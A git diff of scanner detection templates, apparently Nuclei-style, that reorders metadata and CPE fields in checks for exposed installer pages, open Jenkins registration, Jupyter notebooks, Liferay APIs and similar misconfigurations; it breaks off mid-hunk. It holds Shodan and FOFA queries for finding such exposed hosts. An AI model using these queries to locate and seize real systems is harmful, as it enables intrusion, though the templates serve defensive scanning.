cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Installing TYPO3 CMS" - product: typo3 vendor: typo3 + product: typo3 + shodan-query: title:"Installing TYPO3 CMS" tags: misconfig,typo3,install - classification: - cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/umbraco-installer.yaml b/http/misconfiguration/installer/umbraco-installer.yaml index e4fafb4c22..dc0843544e 100644 --- a/http/misconfiguration/installer/umbraco-installer.yaml +++ b/http/misconfiguration/installer/umbraco-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Umbraco is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Install Umbraco" - product: umbraco_cms vendor: umbraco + product: umbraco_cms + shodan-query: title:"Install Umbraco" tags: misconfig,umbraco,install,oss - classification: - cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 8ce531700d..e7b9f3997e 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: UVDesk is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:webkul:uvdesk:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" - product: uvdesk vendor: webkul + product: uvdesk + shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" tags: misconfig,uvdesk,install,exposure - classification: - cpe: cpe:2.3:a:webkul:uvdesk:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index d8d4f1a88d..0fd991ad55 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Vtiger CRM is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:vtiger:vtiger_crm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Welcome to Vtiger CRM" - product: vtiger_crm vendor: vtiger + product: vtiger_crm + shodan-query: html:"Welcome to Vtiger CRM" tags: misconfig,vtiger,install,exposure - classification: - cpe: cpe:2.3:a:vtiger:vtiger_crm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/webcalendar-install.yaml b/http/misconfiguration/installer/webcalendar-install.yaml index 9f66521dd7..7c08c07c12 100644 --- a/http/misconfiguration/installer/webcalendar-install.yaml +++ b/http/misconfiguration/installer/webcalendar-install.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: high description: WebCalendar is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:k5n:webcalendar:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: k5n + product: webcalendar shodan-query: title:"WebCalendar Setup Wizard" fofa-query: title="WebCalendar Setup Wizard" - product: webcalendar - vendor: k5n tags: misconfig,webcalendar,install - classification: - cpe: cpe:2.3:a:k5n:webcalendar:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/webtrees-install.yaml b/http/misconfiguration/installer/webtrees-install.yaml index 471ae52d4a..af1ad6c99b 100644 --- a/http/misconfiguration/installer/webtrees-install.yaml +++ b/http/misconfiguration/installer/webtrees-install.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: WebTrees is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:webtrees:webtrees:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Setup wizard for webtrees" - product: webtrees vendor: webtrees + product: webtrees + shodan-query: title:"Setup wizard for webtrees" tags: misconfig,webtrees,install - classification: - cpe: cpe:2.3:a:webtrees:webtrees:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index 2e33eda9a6..656bdc8d53 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Webuzo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Webuzo Installer" - product: webuzo vendor: softaculous + product: webuzo + shodan-query: title:"Webuzo Installer" tags: misconfig,webuzo,install,exposure - classification: - cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index 99dd2867ca..85ed43441b 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Checks for the presence of a Wiki.js Setup Page. + classification: + cpe: cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Wiki.js Setup" - product: wiki.js vendor: requarks + product: wiki.js + shodan-query: title:"Wiki.js Setup" tags: install,wiki-js,exposure,misconfig - classification: - cpe: cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml index 53dcf1873e..a6c94cb0aa 100644 --- a/http/misconfiguration/installer/wowonder-installer.yaml +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed WoWonder installation page. reference: - https://www.wowonder.com/ + classification: + cpe: cpe:2.3:a:wowonder:wowonder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="WoWonder | Installation" - product: wowonder vendor: wowonder + product: wowonder + fofa-query: body="WoWonder | Installation" tags: misconfig,install,exposure,wowonder - classification: - cpe: cpe:2.3:a:wowonder:wowonder:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml index 6070b36b92..97077840c2 100644 --- a/http/misconfiguration/installer/yzmcms-installer.yaml +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: high description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: yzmcms + product: yzmcms shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" - product: yzmcms - vendor: yzmcms tags: misconfig,yzmcms,install,exposure - classification: - cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml index be2faeda57..17395fcf7d 100644 --- a/http/misconfiguration/installer/zencart-installer.yaml +++ b/http/misconfiguration/installer/zencart-installer.yaml @@ -7,17 +7,17 @@ info: description: Zen Cart is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.zen-cart.com/ + classification: + cpe: cpe:2.3:a:zen-cart:zen_cart:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: zen-cart + product: zen_cart shodan-query: html:"shopping cart program by zen cart" fofa-query: title="Installer" && icon_hash="899320116" - product: zen_cart - vendor: zen-cart tags: misconfig,zencart,install,exposure - classification: - cpe: cpe:2.3:a:zen-cart:zen_cart:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/jaeger-ui-dashboard.yaml b/http/misconfiguration/jaeger-ui-dashboard.yaml index 47053eded9..baa8c536c8 100644 --- a/http/misconfiguration/jaeger-ui-dashboard.yaml +++ b/http/misconfiguration/jaeger-ui-dashboard.yaml @@ -7,16 +7,16 @@ info: description: Jaeger UI dashboard is exposed. reference: - https://www.jaegertracing.io/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Jaeger UI" - product: jaeger_ui - vendor: jaegertracing - tags: misconfig - classification: cpe: cpe:2.3:a:jaegertracing:jaeger_ui:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: jaegertracing + product: jaeger_ui + shodan-query: http.title:"Jaeger UI" + tags: misconfig + http: - method: GET path: @@ -37,4 +37,5 @@ http: group: 1 regex: - '(?i)"gitVersion":\s*"([a-z0-9.]+)"' -# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml index 004b9bed0b..6a04b853af 100644 --- a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml +++ b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml @@ -8,16 +8,16 @@ info: remediation: Its recommended to turn off user registration. reference: - https://www.acunetix.com/vulnerabilities/web/jenkins-open-user-registration/ + classification: + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "X-Jenkins" - product: jenkins vendor: jenkins + product: jenkins + shodan-query: "X-Jenkins" tags: misconfig,jenkins,apache,tomcat - classification: - cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: status: - 200 -# digest: 4a0a00473045022072093faa81551e2704ad9828f77ce884b472c7bb2892f91dea642eb298b763b90221009954d38b921bcdf5d495b32ea81c566d16ebc9e63c7ea016eb7ab791b539f621:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022072093faa81551e2704ad9828f77ce884b472c7bb2892f91dea642eb298b763b90221009954d38b921bcdf5d495b32ea81c566d16ebc9e63c7ea016eb7ab791b539f621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index 443a8766a5..0455ae0e41 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -8,16 +8,16 @@ info: reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml - https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + classification: + cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"contexts known to this" - product: jetty vendor: eclipse + product: jetty + shodan-query: html:"contexts known to this" tags: jetty,misconfig - classification: - cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 404 -# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml index 0abb93a568..1cb8f1df07 100644 --- a/http/misconfiguration/jupyter-notebooks-exposed.yaml +++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml @@ -7,15 +7,15 @@ info: description: Jupyter notebooks are exposed. reference: - https://blog.aquasec.com/python-ransomware-jupyter-notebook - metadata: - max-request: 1 - shodan-query: title:"Home Page - Select or create a notebook" - product: notebook - vendor: jupyter - tags: jupyter,misconfig - classification: cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: jupyter + product: notebook + shodan-query: title:"Home Page - Select or create a notebook" + tags: jupyter,misconfig + http: - method: GET path: @@ -36,4 +36,5 @@ http: - 'Home Page - Select or create a notebook' - '
There are no notebooks running.
' condition: or -# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index aadd0500de..12c92da482 100644 --- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -6,16 +6,16 @@ info: severity: low description: | An attacker can detect the public instance of a Kube-State-Metrics metrics. The Kubernetes API server exposes data about the count, health, and availability of pods, nodes, and other Kubernetes objects. + classification: + cpe: cpe:2.3:a:kubernetes:kube-state-metrics:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:Kube-state-metrics - product: kube-state-metrics vendor: kubernetes + product: kube-state-metrics + shodan-query: title:Kube-state-metrics tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes - classification: - cpe: cpe:2.3:a:kubernetes:kube-state-metrics:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 490a004630440220751e26ea8820611c3b8f083667509aebadd54301a9820aabbf11926c1994300402201688aae6d39e28b14d60088ff490a9913276829f2d9c2d7d9095a0434f80094a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220751e26ea8820611c3b8f083667509aebadd54301a9820aabbf11926c1994300402201688aae6d39e28b14d60088ff490a9913276829f2d9c2d7d9095a0434f80094a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml index a7e88041d2..606b8e4a70 100644 --- a/http/misconfiguration/label-studio-signup.yaml +++ b/http/misconfiguration/label-studio-signup.yaml @@ -6,16 +6,16 @@ info: severity: unknown description: | Detects the presence of the Label Studio sign-up. + classification: + cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1649949475 - product: label_studio vendor: heartex + product: label_studio + shodan-query: http.favicon.hash:-1649949475 tags: label-studio,sign-up,misconfig - classification: - cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* http: - raw: - | @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index f84cdd4df5..9482afc5c3 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: Libvirt Exporter is leaking metrics. + classification: + cpe: cpe:2.3:a:redhat:libvirt:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Libvirt" - product: libvirt vendor: redhat + product: libvirt + shodan-query: title:"Libvirt" tags: libvirt,exposure,debug,misconfig - classification: - cpe: cpe:2.3:a:redhat:libvirt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index 1ab70b5ca0..2f73c5ad83 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: info reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Liferay" - product: liferay_portal vendor: liferay + product: liferay_portal + shodan-query: title:"Liferay" tags: liferay,exposure,api,misconfig - classification: - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 404 -# digest: 4a0a00473045022100b6913004c4a95a7d6a50eb72b70a81e4476030fa9d5308573cd4c03de66713fc02201b1379f60747a88aa48f7c9840e21a51d35a8015ef7f0298acd5d53e5e4cde40:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b6913004c4a95a7d6a50eb72b70a81e4476030fa9d5308573cd4c03de66713fc02201b1379f60747a88aa48f7c9840e21a51d35a8015ef7f0298acd5d53e5e4cde40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index 4d80df4686..cdee008cf1 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: info reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Liferay" - product: liferay_portal vendor: liferay + product: liferay_portal + shodan-query: title:"Liferay" tags: misconfig,exposure,liferay,api - classification: - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a00483046022100844cea6b891f1e88f60abea8ef53b09b843c7da579b44dccc51cc0e98e1e27010221008d720a018887c0d09cf1957815849fae34ddfd6faf0381e741705a1270fe8e31:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100844cea6b891f1e88f60abea8ef53b09b843c7da579b44dccc51cc0e98e1e27010221008d720a018887c0d09cf1957815849fae34ddfd6faf0381e741705a1270fe8e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index e8e6f3b1d2..775ca36a5f 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -8,16 +8,16 @@ info: reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - https://liferay.dev/blogs/-/blogs/securing-the-api-jsonws-ui?_com_liferay_blogs_web_portlet_BlogsPortlet_showFlags=true&scroll=_com_liferay_blogs_web_portlet_BlogsPortlet_discussionContainer + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Liferay" - product: liferay_portal vendor: liferay + product: liferay_portal + shodan-query: title:"Liferay" tags: liferay,exposure,api,misconfig - classification: - cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 7cddc14949..97a1911609 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK,bhutch severity: medium description: Locust is exposed. + classification: + cpe: cpe:2.3:a:locust:locust:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Locust" - product: locust vendor: locust + product: locust + shodan-query: title:"Locust" tags: exposure,locust,misconfig - classification: - cpe: cpe:2.3:a:locust:locust:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index 925e8d7e54..bd9b95495e 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -5,16 +5,16 @@ info: author: PR3R00T severity: high description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely. + classification: + cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"ManageEngine" - product: manageengine_admanager_plus vendor: zohocorp + product: manageengine_admanager_plus + shodan-query: title:"ManageEngine" tags: unauth,misconfig - classification: - cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 